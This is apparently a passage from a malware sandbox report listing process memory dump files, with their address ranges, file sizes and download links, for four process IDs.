memory/1488-122-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-108-0x0000000074760000-0x0000000074783000-memory.dmp

Filesize
140KB

Download
memory/1488-136-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-150-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-164-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-105-0x00000000744C0000-0x0000000074558000-memory.dmp

Filesize
608KB

Download
memory/1488-715-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-1296-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-2139-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/1488-2615-0x00000000003B0000-0x0000000000811000-memory.dmp

Filesize
4.4MB

Download
memory/2160-53-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2160-52-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

Filesize
4KB

Download
memory/2160-80-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2160-57-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2160-59-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2160-50-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2252-3394-0x0000000003230000-0x0000000003250000-memory.dmp

Filesize
128KB

Download
memory/2252-3380-0x00000000032F0000-0x0000000003310000-memory.dmp

Filesize
128KB

Download
memory/2252-3393-0x0000000000150000-0x0000000000C61000-memory.dmp

Filesize
11.1MB

Download
memory/2252-3383-0x0000000003530000-0x0000000003550000-memory.dmp

Filesize
128KB

Download
memory/2252-3382-0x0000000003310000-0x0000000003330000-memory.dmp

Filesize
128KB

Download
memory/2252-3381-0x0000000003550000-0x0000000003570000-memory.dmp

Filesize
128KB

Download
memory/2252-3376-0x0000000000150000-0x0000000000C61000-memory.dmp

Filesize
11.1MB

Download
memory/2252-3378-0x0000000003230000-0x0000000003250000-memory.dmp

Filesize
128KB

Download
memory/2252-3379-0x0000000003250000-0x0000000003270000-memory.dmp

Filesize
128KB

Download
memory/2712-40-0x0000000000240000-0x0000000001466000-memory.dmp

Filesize
18.1MB

Download
memory/2712-5-0x0000000000240000-0x0000000001466000-memory.dmp

Filesize
18.1MB

Download
memory/2712-7-0x0000000000240000-0x0000000001466000-memory.dmp

Filesize
18.1MB

Download
memory/2712-35-0x0000000001960000-0x0000000001961000-memory.dmp

Filesize
4KB

Download
memory/2712-34-0x0000000001540000-0x0000000001541000-memory.dmp

Filesize
4KB

Download
memory/2712-33-0x0000000001530000-0x0000000001531000-memory.dmp

Filesize
4KB

Download